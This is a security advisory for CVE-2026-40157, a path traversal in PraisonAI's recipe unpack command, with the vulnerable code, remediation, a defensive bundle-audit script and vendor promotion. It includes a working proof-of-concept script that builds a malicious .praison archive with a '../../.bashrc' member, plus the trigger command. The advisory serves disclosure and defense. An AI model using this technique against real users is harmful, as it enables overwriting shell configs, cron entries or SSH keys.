CVE-2026-40157

CVE-2026-40157 is a critical-severity path traversal vulnerability in PraisonAI (pip), affecting versions >= 2.7.2, < 4.5.128. It is fixed in 4.5.128.

Summary

Field | Value
Severity | Critical
Type | Path traversal -- arbitrary file write via tar.extract() without member validation
Affected | src/praisonai/praisonai/cli/features/recipe.py:1170-1172

cmd_unpack in the recipe CLI extracts .praison tar archives using raw tar.extract() without validating archive member paths. A .praison bundle containing ../../ entries will write files outside the intended output directory. An attacker who distributes a malicious bundle can overwrite arbitrary files on the victim's filesystem when they run praisonai recipe unpack.

Details

The vulnerable code is in cli/features/recipe.py:1170-1172:

for member in tar.getmembers():
    if member.name != "manifest.json":
        tar.extract(member, recipe_dir)

The only check is whether the member is manifest.json. The code never validates member names -- absolute paths, .. components, and symlinks all pass through. Python's tarfile.extract() resolves these relative to the destination, so a member named ../../.bashrc lands two directories above recipe_dir.

The codebase does contain a safe extraction function (_safe_extractall in recipe/registry.py:131-162) that rejects absolute paths, .. segments, and resolved paths outside the destination. It is used by the pull and publish paths, but cmd_unpack does not call it.

# recipe/registry.py:141-159 -- safe version exists but is not used by cmd_unpack
def _safe_extractall(tar: tarfile.TarFile, dest_dir: Path) -> None:
    dest = str(dest_dir.resolve())
    for member in tar.getmembers():
        if os.path.isabs(member.name):
            raise RegistryError(...)
        if ".." in member.name.split("/"):
            raise RegistryError(...)
        resolved = os.path.realpath(os.path.join(dest, member.name))
        if not resolved.startswith(dest + os.sep):
            raise RegistryError(...)
    tar.extractall(dest_dir)

PoC

Build a malicious bundle:

import tarfile, io, json

manifest = json.dumps({"name": "legit-recipe", "version": "1.0.0"}).encode()

with tarfile.open("malicious.praison", "w:gz") as tar:
    info = tarfile.TarInfo(name="manifest.json")
    info.size = len(manifest)
    tar.addfile(info, io.BytesIO(manifest))

    payload = b"export EVIL=1  # injected by malicious recipe\n"
    evil = tarfile.TarInfo(name="../../.bashrc")
    evil.size = len(payload)
    tar.addfile(evil, io.BytesIO(payload))

Trigger:

praisonai recipe unpack malicious.praison -o ./recipes
# Expected: files written only under ./recipes/legit-recipe/
# Actual:   .bashrc written two directories above the output dir

Affected paths

  • src/praisonai/praisonai/cli/features/recipe.py:1170-1172 -- cmd_unpack extracts tar members without path validation

Impact

Path | Traversal blocked?
praisonai recipe pull <name> | Yes -- uses _safe_extractall
praisonai recipe publish <bundle> | Yes -- uses _safe_extractall
praisonai recipe unpack <bundle> | No -- raw tar.extract()

An attacker needs to get a victim to unpack a malicious .praison bundle -- say, through a shared recipe repository, a link in a tutorial, or by sending it to a colleague directly.

Depending on filesystem permissions, an attacker can overwrite shell config files (.bashrc, .zshrc), cron entries, SSH authorized_keys, or project files in parent directories. The attacker controls both the path and the content of every written file.

Input manipulates file paths to reach files outside the intended directory, such as configuration or credential files. Typical impact: unauthorized file read or write outside the intended directory.

Affected versions

PraisonAI (>= 2.7.2, < 4.5.128)

Security releases

PraisonAI → 4.5.128 (pip)

Kodem intelligence

Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.

Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.

Remediation advice

Replace the raw extraction loop with _safe_extractall:

# cli/features/recipe.py:1170-1172
# Before:
for member in tar.getmembers():
    if member.name != "manifest.json":
        tar.extract(member, recipe_dir)

# After:
from praisonai.recipe.registry import _safe_extractall
_safe_extractall(tar, recipe_dir)
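
Where a bundle has to be handled before the upgrade is in place, its members can be audited without extracting anything. The following is an added example, not PraisonAI's own code: audit_bundle and build_sample_bundle are hypothetical names, the sample archive is constructed in memory, and the check goes slightly beyond the three rules quoted above by also flagging link and special-file members.

```python
import io
import os
import tarfile


def audit_bundle(fileobj, dest_dir):
    """Return (member name, reason) for every member that is unsafe to extract."""
    dest = os.path.realpath(dest_dir)
    findings = []
    with tarfile.open(fileobj=fileobj, mode="r:*") as tar:
        for m in tar.getmembers():
            name = m.name.replace("\\", "/")
            # realpath also follows symlinks that already exist on disk under dest
            target = os.path.realpath(os.path.join(dest, name))
            if name.startswith("/") or os.path.isabs(m.name):
                findings.append((m.name, "absolute path"))
            elif ".." in name.split("/"):
                findings.append((m.name, "parent-directory component"))
            elif os.path.commonpath([dest, target]) != dest:
                findings.append((m.name, "resolves outside destination"))
            elif m.issym() or m.islnk():
                findings.append((m.name, "link to " + m.linkname))
            elif not (m.isfile() or m.isdir()):
                findings.append((m.name, "special file"))
    return findings


def build_sample_bundle():
    """Constructed in-memory .praison-style archive: two benign, three unsafe members."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for name in ("manifest.json", "agents.yaml", "../../.bashrc", "/tmp/abs.txt"):
            data = b"constructed sample\n"
            info = tarfile.TarInfo(name=name)
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))
        link = tarfile.TarInfo(name="docs")  # symlink member, no file body
        link.type = tarfile.SYMTYPE
        link.linkname = "/etc"
        tar.addfile(link)
    buf.seek(0)
    return buf


if __name__ == "__main__":
    for name, reason in audit_bundle(build_sample_bundle(), "./recipes/legit-recipe"):
        print(f"REJECT {name!r}: {reason}")
```

On Python versions that include the PEP 706 extraction filters, passing filter="data" to tar.extract() or tar.extractall() blocks writes outside the destination at extraction time.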

Frequently Asked Questions

  1. What is CVE-2026-40157? CVE-2026-40157 is a critical-severity path traversal vulnerability in PraisonAI (pip), affecting versions >= 2.7.2, < 4.5.128. It is fixed in 4.5.128. Input manipulates file paths to reach files outside the intended directory, such as configuration or credential files.
  2. Which versions of PraisonAI are affected by CVE-2026-40157? PraisonAI (pip) versions >= 2.7.2, < 4.5.128 are affected.
  3. Is there a fix for CVE-2026-40157? Yes. CVE-2026-40157 is fixed in 4.5.128. Upgrade to this version or later.
  4. Is CVE-2026-40157 exploitable, and should I be worried? Whether CVE-2026-40157 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk.
  5. What actually determines whether CVE-2026-40157 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
  6. How do I fix CVE-2026-40157? Upgrade PraisonAI to 4.5.128 or later.
